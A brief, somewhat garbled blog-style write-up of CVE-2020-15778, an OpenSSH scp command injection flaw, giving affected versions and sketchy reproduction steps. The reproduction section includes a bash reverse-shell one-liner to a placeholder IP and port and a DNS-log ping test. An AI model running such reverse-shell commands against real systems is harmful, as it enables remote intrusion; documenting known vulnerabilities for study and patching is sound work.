Openssh Command Injection Vulnerability Cve 2020 15778
Openssh Command Injection Vulnerability Cve 2020 15778
OpenSSH command injection vulnerability CVE-2020-15778
Vulnerability Description
On June 9, 2020, researcher Chinmay Pandya discovered a vulnerability in Openssh, which was released on July 18.
Vulnerability Impact
OpenSSH <= 8.3p1
Vulnerability reappears
</a-alert>
The attack machine creates peiqi.txt and uses scp to upload the file to the /tmp directory.
Execute the command ping dnslog
Just resell shell and replace the command
/bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9999 0>&1
This post is licensed under CC BY 4.0 by the author.